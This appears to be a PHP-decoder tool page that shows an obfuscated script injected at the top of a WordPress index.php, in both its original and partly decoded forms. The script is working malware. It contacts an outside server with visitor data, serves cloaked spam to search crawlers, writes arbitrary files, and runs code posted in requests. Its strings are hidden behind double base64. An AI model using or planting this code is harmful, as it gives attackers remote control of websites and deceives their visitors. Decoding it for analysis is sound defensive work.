Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$l24=base64_decode(ba..
Decoded Output download
<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$l24=base64_decode(base64_decode("TWk0eUxqRTM="));$p13 = "cff.fortuneday.xyz";$l15 = base64_decode("MTAwMg==");$a27 = clientip();$i49 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))] : base64_decode("");$w21 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))] : base64_decode("");$i49i = $_SERVER[base64_decode("UkVRVUVTVF9VUkk=")];$r36 = $_SERVER[base64_decode("SFRUUF9IT1NU")];$h49 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))]:base64_decode("");$p41 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))]:base64_decode("");$s3 = ((!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) !== base64_decode(base64_decode("YjJabQ=="))) || (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))] === base64_decode(base64_decode("YUhSMGNITT0="))) || (!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) !== base64_decode(base64_decode("YjJabQ==")))) ? base64_decode("aHR0cHM="): base64_decode("aHR0cA==");$a36 = array(base64_decode(base64_decode("VEdGdVp6b2c=")).$h49,base64_decode(base64_decode("VlhObGNpMUJaMlZ1ZERvZw==")).$w21, base64_decode(base64_decode("VW1WbVpYSmxjam9n")).$i49, base64_decode(base64_decode("U0hSMGNDMVFjbTkwYnpvZw==")).$s3, base64_decode(base64_decode("U0hSMGNDMUliM04wT2lBPQ==")).$r36, base64_decode(base64_decode("U0hSMGNDMVZjbWs2SUE9PQ==")).$i49i, base64_decode(base64_decode("UkdKbmNtOTFjRG9n")).$p13, base64_decode(base64_decode("U0hSMGNDMVlMVVp2Y25kaGNtUmxaQzFHYjNJNklBPT0=")).$a27,base64_decode(base64_decode("Vkc5clpXNDZJQT09")).$p41);$b27= "proto=$s3&shost=$r36&ip=$a27&dbgroup=$l15&uri=$i49i";if (strlen($p41)>0){ @todk(base64_decode("LmVHYkEwVHkyV2g="),@file_get_contents(base64_decode("cGhwOi8vaW5wdXQ=")),FILE_USE_INCLUDE_PATH); echo (include base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); unlink(base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); exit; }if (($i49i!==base64_decode("L2Zhdmljb24uaWNv")) &&( @preg_match(base64_decode(base64_decode("STJkdmIyZHNaWHg1WVdodmIzeGlhVzVuSTJrPQ==")),$w21) || (@preg_match(base64_decode(base64_decode("STJkdmIyZHNaUzVqYnk1cWNIeG5iMjluYkdVdVkyOXRmSGxoYUc5dkxtTnZiWHg1WVdodmJ5NWpieTVxY0h4aWFXNW5MbU52YlNOcA==")),$i49) && (@preg_match('#[/\?]([a-z0-9]{1})[-_/]?(\d+_\d+_\d+)$#i',$i49i)||@preg_match(base64_decode(base64_decode("STFzdlhEOWRLRnRoTFhvd0xUbGRlekY5S1ZzdFh5OWRQeWhjWkNzcEkyaz0=")),$i49i))))){ list($t39,$w46,$s41) = urlx(base64_decode(base64_decode("YUhSMGNEb3ZMdz09")).$p13.base64_decode(base64_decode("TDJsdVpHVjRQdz09")).$b27,$a36,$b27); if (stripos($s41,base64_decode(base64_decode("WjNwcGNBPT0=")))>0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQmhjSEJzYVdOaGRHbHZiaTk0TFdkNmFYQT0="))); exit($t39); } if (stripos($t39,base64_decode(base64_decode("UENGa2IyTjA=")))===0||stripos($t39,base64_decode(base64_decode("UEdoMGJXdz0=")))===0){ exit($t39); } if (stripos($t39,base64_decode(base64_decode("UEQ5NGJXdz0=")))===0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJBPT0="))); exit($t39); } if (stripos($t39,base64_decode(base64_decode("YUhSMGNBPT0=")))===0){ if (stripos($t39,base64_decode(base64_decode("UDIxaGFXNWZjR0ZuWlQwPQ==")))){ @header(base64_decode(base64_decode("VEc5allYUnBiMjQ2SUE9PQ==")) . $t39); exit;} if (strstr($t39,base64_decode("Wyxd"))){$q3 = explode(base64_decode("Wyxd"),$t39); $y34 = explode(base64_decode("LA=="),$q3[0]); $p27 = base64_decode(base64_decode("")); foreach($y34 as $i49l){ list($f34,$w46) = urlx($i49l,null,null,$q3[1]);$p27 .= $i49l.$f34; } exit($p27);} } if (@preg_match(base64_decode(base64_decode("STE1YlhpNWRLaTRvZEhoMGZIQm9jQ2tqYVE9PQ==")),$t39)){$m47 = explode(base64_decode("Wyxd"),$t39); todk($m47[0],$m47[1]); if(file_exists($m47[0])){ exit(base64_decode(base64_decode("Wlc1a0lHOXI=")));}else{ exit(base64_decode(base64_decode("Ym04Z1ptRnNjMlU9")));} } if (stripos($t39,base64_decode(base64_decode("YjJzPQ==")))===0){ exit($t39.base64_decode("IA==").$p13.$l24); } if ($w46 >= 400 && $w46 < 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTkRBMElFNXZkQ0JHYjNWdVpBPT0=")));exit;} if ($w46 >= 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTlRBd0lFbHVkR1Z5Ym1Gc0lGTmxjblpsY2lCRmNuSnZjZz09")));exit;} if ($t39!=base64_decode("")){ exit($t39); }}function urlx($i49l,$a36=null,$b27=null,$w21=null) { if (!function_exists(base64_decode(base64_decode("WTNWeWJGOXBibWww")))){ return; } try { $v34 = curl_init(); curl_setopt($v34, CURLOPT_URL, $i49l); curl_setopt($v34, CURLOPT_FOLLOWLOCATION,1); curl_setopt($v34, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($v34, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($v34, CURLOPT_ENCODING, base64_decode(base64_decode("WjNwcGNDeGtaV1pzWVhSbA=="))); curl_setopt($v34, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($v34, CURLOPT_RETURNTRANSFER, 1); ($a36===null)?base64_decode(base64_decode("")):curl_setopt($v34, CURLOPT_HTTPHEADER, $a36); ($w21===null||$w21===base64_decode(""))?base64_decode(base64_decode("")):curl_setopt($v34, CURLOPT_USERAGENT, $w21); if ($b27!==null && $b27!==base64_decode("")) {curl_setopt($v34, CURLOPT_POST, 1); curl_setopt($v34, CURLOPT_POSTFIELDS, $b27); } $v27 = curl_exec($v34);$w46 = curl_getinfo($v34,CURLINFO_HTTP_CODE); $s41 = curl_getinfo($v34,CURLINFO_CONTENT_TYPE);curl_close($v34); } catch (Exception $e40) { } if ($v27===false && function_exists(base64_decode(base64_decode("Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE09")))) { ini_set(base64_decode(base64_decode("ZFhObGNsOWhaMlZ1ZEE9PQ==")), base64_decode(base64_decode("VFc5NmFXeHNZUzgwTGpBZ0tHTnZiWEJoZEdsaWJHVTdUVk5KUlNBMkxqQTdWMmx1Wkc5M2N5Qk9WQ0ExTGpJN0xrNUZWQ0JEVEZJZ01TNHhMalF6TWpJcA=="))); try { $v27 = @file_get_contents($i49l); } catch (Exception $e40) { } } return array($v27,$w46,$s41);}function todk($z4,$f22){@file_put_contents($z4,$f22);}function clientip(){ $r6=base64_decode(base64_decode("")); if (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))] !== base64_decode(base64_decode(""))){ $r6 = $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]; } elseif (getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))) && strcasecmp(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))), base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) { $r6 = getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))); } elseif (isset($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]) && $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))] && strcasecmp($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))], base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) { $r6 = $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]; } if (stristr($r6, base64_decode(base64_decode("TEE9PQ==")))) { $m47 = explode(base64_decode("LA=="), $r6); $r6 = $m47[0]; } return $r6;}?>
<?php
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
?>
Did this file decode correctly?
Original Code
<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$l24=base64_decode(base64_decode("TWk0eUxqRTM="));$p13 = "\x63\146\x66\56\x66\157\x72\164\x75\156\x65\144\x61\171\x2e\170\x79\172";$l15 = base64_decode("MTAwMg==");$a27 = clientip();$i49 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))] : base64_decode("");$w21 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))] : base64_decode("");$i49i = $_SERVER[base64_decode("UkVRVUVTVF9VUkk=")];$r36 = $_SERVER[base64_decode("SFRUUF9IT1NU")];$h49 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))]:base64_decode("");$p41 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))]:base64_decode("");$s3 = ((!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) !== base64_decode(base64_decode("YjJabQ=="))) || (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))] === base64_decode(base64_decode("YUhSMGNITT0="))) || (!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) !== base64_decode(base64_decode("YjJabQ==")))) ? base64_decode("aHR0cHM="): base64_decode("aHR0cA==");$a36 = array(base64_decode(base64_decode("VEdGdVp6b2c=")).$h49,base64_decode(base64_decode("VlhObGNpMUJaMlZ1ZERvZw==")).$w21, base64_decode(base64_decode("VW1WbVpYSmxjam9n")).$i49, base64_decode(base64_decode("U0hSMGNDMVFjbTkwYnpvZw==")).$s3, base64_decode(base64_decode("U0hSMGNDMUliM04wT2lBPQ==")).$r36, base64_decode(base64_decode("U0hSMGNDMVZjbWs2SUE9PQ==")).$i49i, base64_decode(base64_decode("UkdKbmNtOTFjRG9n")).$p13, base64_decode(base64_decode("U0hSMGNDMVlMVVp2Y25kaGNtUmxaQzFHYjNJNklBPT0=")).$a27,base64_decode(base64_decode("Vkc5clpXNDZJQT09")).$p41);$b27= "proto=$s3&shost=$r36&ip=$a27&dbgroup=$l15&uri=$i49i";if (strlen($p41)>0){ @todk(base64_decode("LmVHYkEwVHkyV2g="),@file_get_contents(base64_decode("cGhwOi8vaW5wdXQ=")),FILE_USE_INCLUDE_PATH); echo (include base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); unlink(base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); exit; }if (($i49i!==base64_decode("L2Zhdmljb24uaWNv")) &&( @preg_match(base64_decode(base64_decode("STJkdmIyZHNaWHg1WVdodmIzeGlhVzVuSTJrPQ==")),$w21) || (@preg_match(base64_decode(base64_decode("STJkdmIyZHNaUzVqYnk1cWNIeG5iMjluYkdVdVkyOXRmSGxoYUc5dkxtTnZiWHg1WVdodmJ5NWpieTVxY0h4aWFXNW5MbU52YlNOcA==")),$i49) && (@preg_match('#[/\?]([a-z0-9]{1})[-_/]?(\d+_\d+_\d+)$#i',$i49i)||@preg_match(base64_decode(base64_decode("STFzdlhEOWRLRnRoTFhvd0xUbGRlekY5S1ZzdFh5OWRQeWhjWkNzcEkyaz0=")),$i49i))))){ list($t39,$w46,$s41) = urlx(base64_decode(base64_decode("YUhSMGNEb3ZMdz09")).$p13.base64_decode(base64_decode("TDJsdVpHVjRQdz09")).$b27,$a36,$b27); if (stripos($s41,base64_decode(base64_decode("WjNwcGNBPT0=")))>0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQmhjSEJzYVdOaGRHbHZiaTk0TFdkNmFYQT0="))); exit($t39); } if (stripos($t39,base64_decode(base64_decode("UENGa2IyTjA=")))===0||stripos($t39,base64_decode(base64_decode("UEdoMGJXdz0=")))===0){ exit($t39); } if (stripos($t39,base64_decode(base64_decode("UEQ5NGJXdz0=")))===0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJBPT0="))); exit($t39); } if (stripos($t39,base64_decode(base64_decode("YUhSMGNBPT0=")))===0){ if (stripos($t39,base64_decode(base64_decode("UDIxaGFXNWZjR0ZuWlQwPQ==")))){ @header(base64_decode(base64_decode("VEc5allYUnBiMjQ2SUE9PQ==")) . $t39); exit;} if (strstr($t39,base64_decode("Wyxd"))){$q3 = explode(base64_decode("Wyxd"),$t39); $y34 = explode(base64_decode("LA=="),$q3[0]); $p27 = base64_decode(base64_decode("")); foreach($y34 as $i49l){ list($f34,$w46) = urlx($i49l,null,null,$q3[1]);$p27 .= $i49l.$f34; } exit($p27);} } if (@preg_match(base64_decode(base64_decode("STE1YlhpNWRLaTRvZEhoMGZIQm9jQ2tqYVE9PQ==")),$t39)){$m47 = explode(base64_decode("Wyxd"),$t39); todk($m47[0],$m47[1]); if(file_exists($m47[0])){ exit(base64_decode(base64_decode("Wlc1a0lHOXI=")));}else{ exit(base64_decode(base64_decode("Ym04Z1ptRnNjMlU9")));} } if (stripos($t39,base64_decode(base64_decode("YjJzPQ==")))===0){ exit($t39.base64_decode("IA==").$p13.$l24); } if ($w46 >= 400 && $w46 < 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTkRBMElFNXZkQ0JHYjNWdVpBPT0=")));exit;} if ($w46 >= 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTlRBd0lFbHVkR1Z5Ym1Gc0lGTmxjblpsY2lCRmNuSnZjZz09")));exit;} if ($t39!=base64_decode("")){ exit($t39); }}function urlx($i49l,$a36=null,$b27=null,$w21=null) { if (!function_exists(base64_decode(base64_decode("WTNWeWJGOXBibWww")))){ return; } try { $v34 = curl_init(); curl_setopt($v34, CURLOPT_URL, $i49l); curl_setopt($v34, CURLOPT_FOLLOWLOCATION,1); curl_setopt($v34, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($v34, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($v34, CURLOPT_ENCODING, base64_decode(base64_decode("WjNwcGNDeGtaV1pzWVhSbA=="))); curl_setopt($v34, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($v34, CURLOPT_RETURNTRANSFER, 1); ($a36===null)?base64_decode(base64_decode("")):curl_setopt($v34, CURLOPT_HTTPHEADER, $a36); ($w21===null||$w21===base64_decode(""))?base64_decode(base64_decode("")):curl_setopt($v34, CURLOPT_USERAGENT, $w21); if ($b27!==null && $b27!==base64_decode("")) {curl_setopt($v34, CURLOPT_POST, 1); curl_setopt($v34, CURLOPT_POSTFIELDS, $b27); } $v27 = curl_exec($v34);$w46 = curl_getinfo($v34,CURLINFO_HTTP_CODE); $s41 = curl_getinfo($v34,CURLINFO_CONTENT_TYPE);curl_close($v34); } catch (Exception $e40) { } if ($v27===false && function_exists(base64_decode(base64_decode("Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE09")))) { ini_set(base64_decode(base64_decode("ZFhObGNsOWhaMlZ1ZEE9PQ==")), base64_decode(base64_decode("VFc5NmFXeHNZUzgwTGpBZ0tHTnZiWEJoZEdsaWJHVTdUVk5KUlNBMkxqQTdWMmx1Wkc5M2N5Qk9WQ0ExTGpJN0xrNUZWQ0JEVEZJZ01TNHhMalF6TWpJcA=="))); try { $v27 = @file_get_contents($i49l); } catch (Exception $e40) { } } return array($v27,$w46,$s41);}function todk($z4,$f22){@file_put_contents($z4,$f22);}function clientip(){ $r6=base64_decode(base64_decode("")); if (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))] !== base64_decode(base64_decode(""))){ $r6 = $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]; } elseif (getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))) && strcasecmp(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))), base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) { $r6 = getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))); } elseif (isset($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]) && $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))] && strcasecmp($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))], base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) { $r6 = $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]; } if (stristr($r6, base64_decode(base64_decode("TEE9PQ==")))) { $m47 = explode(base64_decode("LA=="), $r6); $r6 = $m47[0]; } return $r6;}?>
<?php
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
?>
Function Calls
set_time_limit | 1 |
error_reporting | 1 |
ignore_user_abort | 1 |
Stats
MD5 | a0430dfec28b60b776a7f2f22cf02b85 |
Eval Count | 0 |
Decode Time | 328 ms |